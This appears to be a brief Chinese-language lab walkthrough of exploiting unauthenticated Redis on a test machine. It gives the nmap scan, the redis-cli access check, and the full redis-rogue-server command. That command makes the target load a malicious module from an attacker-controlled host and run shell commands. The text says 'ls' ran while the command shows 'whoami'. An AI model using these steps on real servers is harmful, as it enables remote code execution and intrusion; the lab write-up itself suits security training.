4-unacc:
1.nmap探测一下靶机端口,redis服务正常开启了,在6379端口
nmap 192.168.225.139 -p 1-65535
2.kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息,证明存在未授权访问漏洞
redis-cli -h 192.168.225.139
3.使用网上的脚本,在redis-rogue-server.py / 目录下
输入命令,成功GETSHELL并执行了ls的命令:
./redis-master.py -r 192.168.225.139 -p 6379 -L 192.168.225.133 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"